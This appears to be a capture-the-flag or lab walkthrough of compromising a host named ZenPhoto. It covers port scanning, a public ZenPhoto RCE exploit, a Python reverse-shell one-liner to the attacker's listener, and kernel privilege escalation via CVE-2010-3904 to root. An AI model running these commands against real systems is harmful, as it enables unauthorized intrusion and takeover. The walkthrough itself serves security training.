# ZenPhoto

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a1f15e30464e92455c1922382f0561c6409ad722%2Fimage.png?alt=media)

## Nmap

```
192.168.59.41 -sS -sV -p-        

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
23/tcp   open  ipp     CUPS 1.4
80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## HTTP

Given the open ports that we have and the versions running on them I am going to jump straight into port 80.

![http://192.168.59.41/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c690191786df19d272c7d28ba557502566fdcbe7%2Fimage.png?alt=media)

The root page for the target machine takes us to a blank page headed 'UNDER CONSTRUCTION'. Ideally we should break out some directory enumeration and `nikto`.

`feroxbuster` and `nikto` both pick up the directory /test/ and subsequent directories.

![Feroxbuster](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ae09cfa19238adf482fb70258c4d7e1a254888e7%2Fimage.png?alt=media)

![Nikto](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4cfd8a0666d6e120935e6d4f52a8ed1f92bac46a%2Fimage.png?alt=media)

The /test/ directory takes us to the following page which as per the bottom right is running on ZenPhoto.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2c47fc863f606754f4af4414dc4c2aea09138e25%2Fimage.png?alt=media)

Viewing the page source and scrolling to the bottom reveals the exact version of ZenPhoto that we are running.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3399823b3bcdfd3f66db5cf1439f29a1d8bec818%2Fimage.png?alt=media)

## Exploitation

A quick Google search for a exploit on this version of ZenPhoto reveals a result for a RCE exploit.

{% embed url="<https://www.exploit-db.com/exploits/18083>" %}

I downloaded the exploit and run it with the following syntax:

```
php exploit.php <Target-IP> <ZenPhoto-Dir>
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-7176156ef363413802c5e55aa85dcd437519ad6e%2Fimage.png?alt=media)

## Stable Shell

We now have a shell on the target machine and we are running as the user www-data. I found with this shell that when you try changing directories or running scripts it would have unexpected behaviour.

I performed a quick check to see if python was installed using `which python`. After confirming Python is installed I tried a quick one liner reverse shell to see if we can get a more stable one.

First I started a `netcat` listener on my attacking machine:

```
sudo nc -lvp 443
```

The run the following command on the target machine:

```
python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
```

We now have a more stable shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dbfff93fcb376fda0e3653e36944e8332c19c060%2Fimage.png?alt=media)

## Privilege Escalation

I then started a `Python SimpleHTTPServer` on my attacking machine and downloaded some scripts for privilege escalation.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8230a90ec8e1d705d61ef86fd768ab0b1026a438%2Fimage.png?alt=media)

I executed `suggester.sh` which picked up the follow exploit as being 'highly probable'.

```
[+] [CVE-2010-3904] rds

   Details: http://www.securityfocus.com/archive/1/514379
   Exposure: highly probable
   Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},[ ubuntu=10.04{kernel:2.6.32-(21|24)-generic} ]
   Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
```

{% embed url="<https://www.exploit-db.com/exploits/15285>" %}

I downloaded the file onto the attacking machine using `wget` then compiled using `gcc`.

```
gcc exploit.c -o exploit
```

After compiling was finished I used `chmod` to make the exploit executable.

```
chmod +x exploit
```

I then executed the exploit and was able to gain a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-457b587ef48d8d75c140eb68c9b8e1bb5410295e%2Fimage.png?alt=media)